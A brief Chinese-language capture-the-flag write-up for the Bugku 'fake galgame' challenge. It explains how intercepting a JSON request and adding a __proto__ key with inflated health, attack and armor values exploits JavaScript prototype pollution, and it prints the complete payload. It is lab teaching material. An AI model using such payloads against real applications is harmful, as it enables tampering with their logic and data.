bugku fake galgame

考点：原型链污染
首先burpsuite抓包发现传的是这种形式:

{"attributes":{"health":a,"attack":b,"armor":c}}

开始想着说不定存在一组(a,b,c)满足 跑了一下发现也不行
这里要用到javascript的原型链污染
简单理解就是 proto 可以对类进行覆写
而源码提示将属性设为0即为没有这项属性
观察源码 发现解析json时用的是JavaScript

所以可以用原型链污染
所以我们这么构造:

{"attributes":{"health":0,"attack":0,"armor":0,"__proto__":{"health":123123123123,"attack":123123123,"armor":123123123}}}

即可